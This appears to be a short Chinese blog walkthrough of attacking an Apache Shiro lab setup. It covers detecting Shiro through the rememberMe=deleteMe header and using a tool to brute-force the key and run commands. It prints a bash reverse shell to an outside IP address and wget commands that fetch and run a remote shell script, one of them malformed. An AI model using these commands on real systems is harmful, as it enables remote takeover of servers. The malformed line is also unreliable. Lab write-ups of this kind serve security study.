当前位置: 首页 > article >正文

常见框架漏洞—Shiro

article 2025/3/27 21:00:55

 1.搭建环境

2.访问网页登录并进行抓包

3.发送到重放器

看响应包 header中返回 rememberMe=deleteMe 值,说明该系统使⽤了Shiro框架

4.使用工具连接,输入url并爆破密钥

5.在命令执行框中输入命令

我们输入反弹shell

发现监听不到

6.我们在云服务器新建一个1.txt,里面写入反弹shell的代码

bash -i >& /dev/tcp/47.108.150.249/8888 0>&1

/bin/bash /wget -qO /tmp/shell.sh https://47.108.150.249/ /shell.sh
/bin/bash /tmp/shell.sh
我们访问后发现成功监听!!

http://www.kler.cn/a/599646.html

相关文章:

  • 【大模型LLM第十四篇】Agent学习之anthropic-quickstarts Agent
  • Lisp语言的学习路线
  • 使用现有三自变量和腐蚀速率数据拟合高精度模型,并进行预测和自变量贡献度分析的一般步骤
  • 聊聊langchain4j的HTTP Client
  • 力扣刷题78. 子集
  • python 中match...case 和 C switch case区别
  • 前端传来的不同类型参数,后端 SpringMVC 怎么接收?
  • 【Unity Shader编程】之透明物体渲染
  • 【VUE】day07 路由
  • FFmpeg6.1.1 MSYS2+GCC 源码编译
  • 【Java SE】单例设计模式
  • ngx_http_core_server_name
  • RocketMQ 面试备战指南
  • 在 IntelliJIDEA中实现Spring Boot多实例运行:修改配置与批量启动详解
  • java实现coze平台鉴权+工作流调用(踩坑记录)
  • Springboot的jak安装与配置教程
  • java版嘎嘎快充玉阳软件互联互通中电联云快充协议充电桩铁塔协议汽车单车一体充电系统源码uniapp
  • 0324-项目
  • 豆包AI插件:提升浏览器使用效率的智能助手
  • 10分钟打造专属AI助手!ToDesk云电脑/顺网云/海马云操作DeepSeek哪家强?